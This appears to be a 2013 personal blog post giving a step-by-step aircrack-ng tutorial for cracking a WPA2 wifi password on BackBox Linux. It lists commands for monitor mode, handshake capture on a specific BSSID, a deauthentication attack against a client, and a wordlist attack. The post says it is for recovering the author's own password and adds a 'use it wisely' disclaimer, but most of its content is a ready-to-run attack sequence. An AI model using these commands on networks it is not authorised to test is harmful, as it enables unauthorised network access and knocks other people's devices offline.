Jumat, 23 Agustus 2013

How to Look password wifi or WPA2 with linux backbox 2013


It sounds a bit silly when I forgot the password to my wifi, this is what I do, with its own password guessing that I have created.

1. entered at the terminal as root

>> in terminal write this command :

Note : This tutorial was made, not to destroy and break passwords aimed wifi someone who is not our right, this tutorial is made just for learning activities and when you're in desperate need, Use it wisely.

1. airmon-ng
2. airmon-ng start wlan0
3. airodump-ng mon0



and then write command bellow :

4. airodump-ng --channel 1 --write output --bssid 64:70:02:E5:F8:28 mon0



let it run and open a new terminal, and then type the following command :

5. aireplay-ng --deauth 1 -a 64:70:02:E5:F8:28 -c CC:AF:78:54:05:A3 mon0



6. aircrack-ng output-01.cap -w /root/wordlist or aircrack-ng output-02.cap -w /root/wordlist



wordlist is a data set to WPA2 password guessing, because it is in need patience to find out which type of password security WPA2. so you can match the WPA password degan data set that you have got.

well now i can use my internet connection back..... 

Note : This tutorial was made, not to destroy and break passwords aimed wifi someone who is not our right, this tutorial is made just for learning activities and when you're in desperate need, Use it wisely.

Tidak ada komentar:

Posting Komentar